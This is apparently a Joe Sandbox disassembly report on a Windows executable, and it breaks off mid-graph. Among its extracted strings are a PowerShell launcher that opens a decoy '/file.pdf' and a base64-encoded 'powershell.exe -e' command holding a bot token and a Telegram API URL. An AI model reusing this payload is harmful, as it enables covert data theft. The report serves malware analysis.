7ff767ef51a0 39 API calls 14800->14802 14803 7ff767ef51a0 39 API calls 14801->14803 14802->14801 14804 7ff767ef13e7 14803->14804 14805 7ff767ef9b3c __std_exception_copy 37 API calls 14804->14805 14814 7ff767ef1518 14804->14814 14806 7ff767ef149c 14805->14806 14808 7ff767ef14da 14806->14808 14811 7ff767ef1513 14806->14811 14807 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14809 7ff767ef151e __std_exception_destroy 14807->14809 14810 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14808->14810 14809->14797 14812 7ff767ef1500 14810->14812 14813 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14811->14813 14812->14797 14813->14814 14814->14807 14818 7ff767ef46ee 14815->14818 14816 7ff767ef47cd 14817 7ff767ef1230 39 API calls 14816->14817 14820 7ff767ef47d3 14817->14820 14818->14816 14819 7ff767ef473a 14818->14819 14821 7ff767ef470a BuildCatchObjectHelperInternal 14818->14821 14824 7ff767ef4792 14818->14824 14823 7ff767ef7e98 std::_Facet_Register 39 API calls 14819->14823 14827 7ff767ef47c7 14819->14827 14822 7ff767ef40a0 79 API calls 14820->14822 14821->14800 14825 7ff767ef47f4 14822->14825 14826 7ff767ef4750 14823->14826 14828 7ff767ef7e98 std::_Facet_Register 39 API calls 14824->14828 14825->14800 14826->14821 14830 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14826->14830 14829 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14827->14829 14828->14821 14829->14816 14830->14827 14832 7ff767f0492c _Getctype 45 API calls 14831->14832 14833 7ff767f039bd 14832->14833 14834 7ff767effe88 BuildCatchObjectHelperInternal 45 API calls 14833->14834 14835 7ff767f039dd 14834->14835 16227 7ff767ef3420 16228 7ff767ef3433 16227->16228 16229 7ff767ef345f 16227->16229 16228->16229 16232 7ff767efdee8 16228->16232 16233 7ff767efdef6 16232->16233 16235 7ff767efdefd 16232->16235 16238 7ff767efdd20 16233->16238 16236 7ff767ef344f 16235->16236 16241 7ff767efdce0 16235->16241 16248 7ff767efdbfc 16238->16248 16256 7ff767efe43c EnterCriticalSection 16241->16256 16255 7ff767efff30 EnterCriticalSection 16248->16255

                                                                                    Executed Functions

                                                                                    Function 00007FF767EF28C0 Relevance: 30.3, APIs: 10, Strings: 7, Instructions: 594processsynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 7ff767ef28c0-7ff767ef2969 call 7ff767ef5db0 call 7ff767ef6d0c call 7ff767ef4590 7 7ff767ef297e-7ff767ef298a 0->7 8 7ff767ef296b-7ff767ef297c 0->8 9 7ff767ef2991-7ff767ef29ac 7->9 8->9 10 7ff767ef32b6-7ff767ef32c7 call 7ff767ef2850 9->10 11 7ff767ef29b2-7ff767ef29ed call 7ff767ef6af4 9->11 16 7ff767ef32c8-7ff767ef32cd call 7ff767ef1660 10->16 17 7ff767ef2a61-7ff767ef2ab9 call 7ff767ef51a0 11->17 18 7ff767ef29ef-7ff767ef29f6 11->18 27 7ff767ef32ce-7ff767ef32d9 call 7ff767ef19d0 16->27 25 7ff767ef2aed-7ff767ef2b08 17->25 26 7ff767ef2abb-7ff767ef2acd 17->26 18->16 20 7ff767ef29fc-7ff767ef2a1a call 7ff767ef6b1c 18->20 20->27 34 7ff767ef2a20-7ff767ef2a5b call 7ff767ef6620 call 7ff767ef6b1c 20->34 31 7ff767ef2b41-7ff767ef2bab call 7ff767f12940 call 7ff767ef4d20 25->31 32 7ff767ef2b0a-7ff767ef2b21 25->32 29 7ff767ef2acf-7ff767ef2ae2 26->29 30 7ff767ef2ae8 call 7ff767ef7e90 26->30 43 7ff767ef32da-7ff767ef32e3 call 7ff767ef19d0 27->43 29->30 35 7ff767ef32e4-7ff767ef32e9 call 7ff767eff748 29->35 30->25 57 7ff767ef2bad-7ff767ef2bc0 call 7ff767ef4370 call 7ff767ef4c20 31->57 58 7ff767ef2bf7-7ff767ef2cb9 call 7ff767ef5cb0 call 7ff767ef5710 * 2 31->58 37 7ff767ef2b23-7ff767ef2b36 32->37 38 7ff767ef2b3c call 7ff767ef7e90 32->38 34->17 34->43 54 7ff767ef32ea-7ff767ef32ed 35->54 37->35 37->38 38->31 43->35 55 7ff767ef32ef-7ff767ef32f6 54->55 56 7ff767ef32f8-7ff767ef3309 54->56 59 7ff767ef330d-7ff767ef333d call 7ff767ef1320 call 7ff767ef1e40 call 7ff767ef9d80 55->59 56->59 68 7ff767ef2bc5-7ff767ef2bc8 57->68 77 7ff767ef2d51-7ff767ef2d65 call 7ff767ef66c0 58->77 78 7ff767ef2cbf-7ff767ef2cce 58->78 79 7ff767ef333e-7ff767ef3343 call 7ff767eff748 59->79 68->58 71 7ff767ef2bca-7ff767ef2bf1 68->71 71->54 71->58 89 7ff767ef2d68-7ff767ef2dae 77->89 81 7ff767ef2cd3-7ff767ef2ce4 78->81 82 7ff767ef2cd0 78->82 85 7ff767ef2ce6-7ff767ef2ced 81->85 86 7ff767ef2d04 81->86 82->81 85->86 90 7ff767ef2cef-7ff767ef2cf2 85->90 87 7ff767ef2d09-7ff767ef2d4f call 7ff767f122a0 * 3 86->87 87->89 94 7ff767ef2db0-7ff767ef2de9 call 7ff767f122a0 89->94 95 7ff767ef2deb-7ff767ef2e08 call 7ff767ef59a0 89->95 91 7ff767ef2cf4-7ff767ef2cf7 90->91 92 7ff767ef2cf9-7ff767ef2d02 90->92 91->87 92->87 100 7ff767ef2e0d-7ff767ef2e57 call 7ff767ef6410 94->100 95->100 106 7ff767ef2e84-7ff767ef2e9b call 7ff767ef59a0 100->106 107 7ff767ef2e59-7ff767ef2e82 100->107 109 7ff767ef2ea0-7ff767ef2ee2 106->109 107->109 111 7ff767ef2ee4-7ff767ef2efb 109->111 112 7ff767ef2f1b-7ff767ef2f39 109->112 113 7ff767ef2f16 call 7ff767ef7e90 111->113 114 7ff767ef2efd-7ff767ef2f10 111->114 115 7ff767ef2f3b-7ff767ef2f54 112->115 116 7ff767ef2f7c-7ff767ef2f85 112->116 113->112 114->79 114->113 117 7ff767ef2f56-7ff767ef2f69 115->117 118 7ff767ef2f6f-7ff767ef2f74 call 7ff767ef7e90 115->118 119 7ff767ef2fc6-7ff767ef2fda 116->119 120 7ff767ef2f87-7ff767ef2f9e 116->120 117->79 117->118 118->116 125 7ff767ef2fdc-7ff767ef2ff2 119->125 126 7ff767ef301a-7ff767ef302c 119->126 123 7ff767ef2fa0-7ff767ef2fb3 120->123 124 7ff767ef2fb9-7ff767ef2fbe call 7ff767ef7e90 120->124 123->79 123->124 124->119 131 7ff767ef2ff4-7ff767ef3007 125->131 132 7ff767ef300d-7ff767ef3012 call 7ff767ef7e90 125->132 127 7ff767ef3064-7ff767ef3100 CreateProcessW 126->127 128 7ff767ef302e-7ff767ef3044 126->128 135 7ff767ef3125-7ff767ef3130 127->135 136 7ff767ef3102-7ff767ef311f WaitForSingleObject CloseHandle * 2 127->136 133 7ff767ef3046-7ff767ef3059 128->133 134 7ff767ef305f call 7ff767ef7e90 128->134 131->79 131->132 132->126 133->79 133->134 134->127 140 7ff767ef3132-7ff767ef314b 135->140 141 7ff767ef316b-7ff767ef318e 135->141 136->135 143 7ff767ef3166 call 7ff767ef7e90 140->143 144 7ff767ef314d-7ff767ef3160 140->144 145 7ff767ef31c4-7ff767ef324c call 7ff767ef40a0 call 7ff767ef74d8 141->145 146 7ff767ef3190-7ff767ef31a4 141->146 143->141 144->143 148 7ff767ef32b0-7ff767ef32b5 call 7ff767eff748 144->148 158 7ff767ef327e-7ff767ef32af call 7ff767ef7e70 145->158 159 7ff767ef324e-7ff767ef3262 145->159 150 7ff767ef31a6-7ff767ef31b9 146->150 151 7ff767ef31bf call 7ff767ef7e90 146->151 148->10 150->148 150->151 151->145 160 7ff767ef3264-7ff767ef3277 159->160 161 7ff767ef3279 call 7ff767ef7e90 159->161 160->148 160->161 161->158
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle__std_fs_convert_wide_to_narrow$CreateErrorLastObjectProcessSingleWait__std_exception_copy__std_fs_code_page
                                                                                    • String ID: '; powershell.exe -e '$/file.pdf$JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$powershell.exe -Command "Start-Process '
                                                                                    • API String ID: 1602825194-3990327364
                                                                                    • Opcode ID: 41be19a45a8101ab6089faecaffeac4cb2b4cc33ac101a02d1ac3be11a66a440
                                                                                    • Instruction ID: f3eb6c398f189e575d17ce1832c61c94790a2ddc39d0328f835bd6e66645a54c
                                                                                    • Opcode Fuzzy Hash: 41be19a45a8101ab6089faecaffeac4cb2b4cc33ac101a02d1ac3be11a66a440
                                                                                    • Instruction Fuzzy Hash: 3D528E72A18BC1C5EB10DB65D8603EDA361FB98798FC45222EA5C07E99DF7CD286C710
                                                                                    Function 00007FF767F0FEE8 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 165 7ff767f0fee8-7ff767f0ff5b call 7ff767f0facc 168 7ff767f0ff5d-7ff767f0ff66 call 7ff767f00688 165->168 169 7ff767f0ff75-7ff767f0ff7f call 7ff767f0c2fc 165->169 176 7ff767f0ff69-7ff767f0ff70 call 7ff767f006a8 168->176 174 7ff767f0ff9a-7ff767f10003 CreateFileW 169->174 175 7ff767f0ff81-7ff767f0ff98 call 7ff767f00688 call 7ff767f006a8 169->175 178 7ff767f10080-7ff767f1008b GetFileType 174->178 179 7ff767f10005-7ff767f1000b 174->179 175->176 187 7ff767f102b6-7ff767f102d6 176->187 182 7ff767f1008d-7ff767f100c8 GetLastError call 7ff767f0061c CloseHandle 178->182 183 7ff767f100de-7ff767f100e5 178->183 185 7ff767f1004d-7ff767f1007b GetLastError call 7ff767f0061c 179->185 186 7ff767f1000d-7ff767f10011 179->186 182->176 199 7ff767f100ce-7ff767f100d9 call 7ff767f006a8 182->199 190 7ff767f100e7-7ff767f100eb 183->190 191 7ff767f100ed-7ff767f100f0 183->191 185->176 186->185 192 7ff767f10013-7ff767f1004b CreateFileW 186->192 196 7ff767f100f6-7ff767f1014b call 7ff767f0c214 190->196 191->196 197 7ff767f100f2 191->197 192->178 192->185 204 7ff767f1016a-7ff767f1019b call 7ff767f0f84c 196->204 205 7ff767f1014d-7ff767f10159 call 7ff767f0fcd4 196->205 197->196 199->176 211 7ff767f1019d-7ff767f1019f 204->211 212 7ff767f101a1-7ff767f101e3 204->212 205->204 210 7ff767f1015b 205->210 213 7ff767f1015d-7ff767f10165 call 7ff767f05e60 210->213 211->213 214 7ff767f10205-7ff767f10210 212->214 215 7ff767f101e5-7ff767f101e9 212->215 213->187 218 7ff767f102b4 214->218 219 7ff767f10216-7ff767f1021a 214->219 215->214 217 7ff767f101eb-7ff767f10200 215->217 217->214 218->187 219->218 221 7ff767f10220-7ff767f10265 CloseHandle CreateFileW 219->221 222 7ff767f10267-7ff767f10295 GetLastError call 7ff767f0061c call 7ff767f0c43c 221->222 223 7ff767f1029a-7ff767f102af 221->223 222->223 223->218
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                    • String ID:
                                                                                    • API String ID: 1617910340-0
                                                                                    • Opcode ID: cd617a6eb87e8d63d3f009fae8cd3b179463d396c4807aaae279dc048755ae53
                                                                                    • Instruction ID: c9488acf68dbaed9e86840042277a193642cf14f2c457611cbef904ae9bd8632
                                                                                    • Opcode Fuzzy Hash: cd617a6eb87e8d63d3f009fae8cd3b179463d396c4807aaae279dc048755ae53
                                                                                    • Instruction Fuzzy Hash: 87C1BF36B28A41C5EB51EFA5C4A0AEC7761E789BE8F810225DA2E57794CF78D053C720
                                                                                    Function 00007FF767F059E0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 228 7ff767f059e0-7ff767f05a05 229 7ff767f05cd3 228->229 230 7ff767f05a0b-7ff767f05a0e 228->230 231 7ff767f05cd5-7ff767f05ce5 229->231 232 7ff767f05a10-7ff767f05a42 call 7ff767eff65c 230->232 233 7ff767f05a47-7ff767f05a73 230->233 232->231 234 7ff767f05a75-7ff767f05a7c 233->234 235 7ff767f05a7e-7ff767f05a84 233->235 234->232 234->235 237 7ff767f05a86-7ff767f05a8f call 7ff767f081bc 235->237 238 7ff767f05a94-7ff767f05aa9 call 7ff767f0ee00 235->238 237->238 243 7ff767f05bc3-7ff767f05bcc 238->243 244 7ff767f05aaf-7ff767f05ab8 238->244 245 7ff767f05c20-7ff767f05c45 WriteFile 243->245 246 7ff767f05bce-7ff767f05bd4 243->246 244->243 247 7ff767f05abe-7ff767f05ac2 244->247 248 7ff767f05c50 245->248 249 7ff767f05c47-7ff767f05c4d GetLastError 245->249 250 7ff767f05bd6-7ff767f05bd9 246->250 251 7ff767f05c0c-7ff767f05c1e call 7ff767f05498 246->251 252 7ff767f05ac4-7ff767f05acc call 7ff767f00770 247->252 253 7ff767f05ad3-7ff767f05ade 247->253 255 7ff767f05c53 248->255 249->248 256 7ff767f05bdb-7ff767f05bde 250->256 257 7ff767f05bf8-7ff767f05c0a call 7ff767f056b8 250->257 271 7ff767f05bb0-7ff767f05bb7 251->271 252->253 259 7ff767f05ae0-7ff767f05ae9 253->259 260 7ff767f05aef-7ff767f05b04 GetConsoleMode 253->260 264 7ff767f05c58 255->264 265 7ff767f05c64-7ff767f05c6e 256->265 266 7ff767f05be4-7ff767f05bf6 call 7ff767f0559c 256->266 257->271 259->243 259->260 261 7ff767f05bbc 260->261 262 7ff767f05b0a-7ff767f05b10 260->262 261->243 269 7ff767f05b16-7ff767f05b19 262->269 270 7ff767f05b99-7ff767f05bab call 7ff767f05020 262->270 272 7ff767f05c5d 264->272 273 7ff767f05c70-7ff767f05c75 265->273 274 7ff767f05ccc-7ff767f05cd1 265->274 266->271 277 7ff767f05b24-7ff767f05b32 269->277 278 7ff767f05b1b-7ff767f05b1e 269->278 270->271 271->264 272->265 280 7ff767f05ca3-7ff767f05cad 273->280 281 7ff767f05c77-7ff767f05c7a 273->281 274->231 285 7ff767f05b34 277->285 286 7ff767f05b90-7ff767f05b94 277->286 278->272 278->277 283 7ff767f05cb4-7ff767f05cc3 280->283 284 7ff767f05caf-7ff767f05cb2 280->284 287 7ff767f05c93-7ff767f05c9e call 7ff767f00664 281->287 288 7ff767f05c7c-7ff767f05c8b 281->288 283->274 284->229 284->283 289 7ff767f05b38-7ff767f05b4f call 7ff767f0f048 285->289 286->255 287->280 288->287 294 7ff767f05b51-7ff767f05b5d 289->294 295 7ff767f05b87-7ff767f05b8d GetLastError 289->295 296 7ff767f05b5f-7ff767f05b71 call 7ff767f0f048 294->296 297 7ff767f05b7c-7ff767f05b83 294->297 295->286 296->295 301 7ff767f05b73-7ff767f05b7a 296->301 297->286 299 7ff767f05b85 297->299 299->289 301->297
                                                                                    APIs
                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF767F059CB,?), ref: 00007FF767F05AFC
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF767F059CB,?), ref: 00007FF767F05B87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleErrorLastMode
                                                                                    • String ID:
                                                                                    • API String ID: 953036326-0
                                                                                    • Opcode ID: 2e72a14a40dcdbc440ab8e2dea6762219126c6135b7ef8777481cfa15dd251e3
                                                                                    • Instruction ID: 38698d0df00964054145b0aa27e45314855f22eae22b5323020fa0e3db620597
                                                                                    • Opcode Fuzzy Hash: 2e72a14a40dcdbc440ab8e2dea6762219126c6135b7ef8777481cfa15dd251e3
                                                                                    • Instruction Fuzzy Hash: DD91B262A08651C5F750AB6994B0EFDABA0BB44BC9F944139DE0E57784CEB8E4838720
                                                                                    Function 00007FF767EF6D0C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00007FF767EF6AA4: GetModuleHandleW.KERNEL32(?,?,?,00007FF767EF6D26), ref: 00007FF767EF6ABA
                                                                                      • Part of subcall function 00007FF767EF6AA4: GetProcAddress.KERNEL32(?,?,?,00007FF767EF6D26), ref: 00007FF767EF6ACA
                                                                                    • GetLastError.KERNEL32 ref: 00007FF767EF6D30
                                                                                      • Part of subcall function 00007FF767EFFE88: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF767EFDAC6,?,?,?,00007FF767EFF64A), ref: 00007FF767EFFEAE
                                                                                    • GetFileAttributesW.KERNELBASE ref: 00007FF767EF6D3F
                                                                                    • __std_fs_open_handle.LIBCPMT ref: 00007FF767EF6D68
                                                                                    • CloseHandle.KERNEL32 ref: 00007FF767EF6D7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$AddressAttributesCloseErrorFeatureFileLastModulePresentProcProcessor__std_fs_open_handle
                                                                                    • String ID:
                                                                                    • API String ID: 156590933-0
                                                                                    • Opcode ID: 6a6f73d8c6b678b20650fb784add4d01299f4f483c1c765fbfb181a8c8681b05
                                                                                    • Instruction ID: 08f4071ee260492cc6faf9622dad407149559988ea5543bdce9667a41798c1d4
                                                                                    • Opcode Fuzzy Hash: 6a6f73d8c6b678b20650fb784add4d01299f4f483c1c765fbfb181a8c8681b05
                                                                                    • Instruction Fuzzy Hash: CD119831A1C542C6E7507726A0A823AA360DF847F0FD80635F97E46ED5EE3DD55B8B10
                                                                                    Function 00007FF767F0696C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: LCMapStringEx
                                                                                    • API String ID: 2568140703-3893581201
                                                                                    • Opcode ID: 5eb25842227b41f3442d1bf3edcfa990ab72379bd8bedd3bb851ce65e1ed33bf
                                                                                    • Instruction ID: 67cd49f063386ec2239244a2e272a30d82af3cbcb59eeb8ad3274c1e710de785
                                                                                    • Opcode Fuzzy Hash: 5eb25842227b41f3442d1bf3edcfa990ab72379bd8bedd3bb851ce65e1ed33bf
                                                                                    • Instruction Fuzzy Hash: FA212C35608B81C6DB64DF16B8506AAB7A4FBC8BD4F848136EE8D43B19DF3CD5528B40
                                                                                    Function 00007FF767EF8224 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                    • String ID:
                                                                                    • API String ID: 3251591375-0
                                                                                    • Opcode ID: 474476ee4c044e0c2c7cf4e5ef395ad6e649675cc114b0a31db13de272242a06
                                                                                    • Instruction ID: 7a49996c929c5e44f0a93cfc950f1798342bdd6afa17158f61d9d3213bd91226
                                                                                    • Opcode Fuzzy Hash: 474476ee4c044e0c2c7cf4e5ef395ad6e649675cc114b0a31db13de272242a06
                                                                                    • Instruction Fuzzy Hash: 33311831A09543C6FB54BB6694726FDA3919F813C8FC80035FA4D47AE7DE2CA80B8231
                                                                                    Function 00007FF767F0B3C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-3916222277
                                                                                    • Opcode ID: 875b9b8a40c284ead772abb435dc8a77a384c0ab268c76e74828773d368971c8
                                                                                    • Instruction ID: c2573fa915ae84c9102f0230f244fd55cea79c84384814af14a6fa8a4f0af5ac
                                                                                    • Opcode Fuzzy Hash: 875b9b8a40c284ead772abb435dc8a77a384c0ab268c76e74828773d368971c8
                                                                                    • Instruction Fuzzy Hash: B0518B72A1C6C1CAE7209F24E4646EDB7A0F748789F944136D68D43B8ACF78D546CB10
                                                                                    Function 00007FF767F0B954 Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 475 7ff767f0b954-7ff767f0b987 call 7ff767f0b2b0 478 7ff767f0b98d-7ff767f0b99a 475->478 479 7ff767f0bbe1-7ff767f0bbe4 call 7ff767f0b330 475->479 481 7ff767f0b99d-7ff767f0b99f 478->481 482 7ff767f0bbe9 479->482 483 7ff767f0baeb-7ff767f0bb19 call 7ff767f12940 481->483 484 7ff767f0b9a5-7ff767f0b9b0 481->484 485 7ff767f0bbeb-7ff767f0bc10 call 7ff767ef7e70 482->485 492 7ff767f0bb1c-7ff767f0bb22 483->492 484->481 487 7ff767f0b9b2-7ff767f0b9b8 484->487 489 7ff767f0b9be-7ff767f0b9c9 IsValidCodePage 487->489 490 7ff767f0bae3-7ff767f0bae6 487->490 489->490 493 7ff767f0b9cf-7ff767f0b9d6 489->493 490->485 495 7ff767f0bb62-7ff767f0bb6c 492->495 496 7ff767f0bb24-7ff767f0bb27 492->496 497 7ff767f0b9d8-7ff767f0b9e6 493->497 498 7ff767f0b9fe-7ff767f0ba0d GetCPInfo 493->498 495->492 503 7ff767f0bb6e-7ff767f0bb7a 495->503 496->495 499 7ff767f0bb29-7ff767f0bb34 496->499 500 7ff767f0b9ea-7ff767f0b9f9 497->500 501 7ff767f0bad7-7ff767f0badd 498->501 502 7ff767f0ba13-7ff767f0ba33 call 7ff767f12940 498->502 504 7ff767f0bb5a-7ff767f0bb60 499->504 505 7ff767f0bb36 499->505 506 7ff767f0bbd7-7ff767f0bbda call 7ff767f0b3c8 500->506 501->479 501->490 519 7ff767f0ba39-7ff767f0ba42 502->519 520 7ff767f0bacd 502->520 508 7ff767f0bb7c-7ff767f0bb7f 503->508 509 7ff767f0bba5 503->509 504->495 504->496 512 7ff767f0bb3a-7ff767f0bb41 505->512 517 7ff767f0bbdf 506->517 514 7ff767f0bb9c-7ff767f0bba3 508->514 515 7ff767f0bb81-7ff767f0bb84 508->515 510 7ff767f0bbac-7ff767f0bbbf 509->510 516 7ff767f0bbc4-7ff767f0bbd5 510->516 512->504 518 7ff767f0bb43-7ff767f0bb58 512->518 514->510 521 7ff767f0bb93-7ff767f0bb9a 515->521 522 7ff767f0bb86-7ff767f0bb88 515->522 516->506 516->516 517->482 518->504 518->512 523 7ff767f0ba70-7ff767f0ba74 519->523 524 7ff767f0ba44-7ff767f0ba47 519->524 525 7ff767f0bacf-7ff767f0bad2 520->525 521->510 522->510 526 7ff767f0bb8a-7ff767f0bb91 522->526 528 7ff767f0ba79-7ff767f0ba82 523->528 524->523 527 7ff767f0ba49-7ff767f0ba52 524->527 525->500 526->510 530 7ff767f0ba68-7ff767f0ba6e 527->530 531 7ff767f0ba54-7ff767f0ba59 527->531 528->528 529 7ff767f0ba84-7ff767f0ba8d 528->529 532 7ff767f0babd 529->532 533 7ff767f0ba8f-7ff767f0ba92 529->533 530->523 530->524 534 7ff767f0ba5c-7ff767f0ba66 531->534 537 7ff767f0bac4-7ff767f0bacb 532->537 535 7ff767f0bab4-7ff767f0babb 533->535 536 7ff767f0ba94-7ff767f0ba97 533->536 534->530 534->534 535->537 538 7ff767f0ba99-7ff767f0ba9b 536->538 539 7ff767f0baab-7ff767f0bab2 536->539 537->525 540 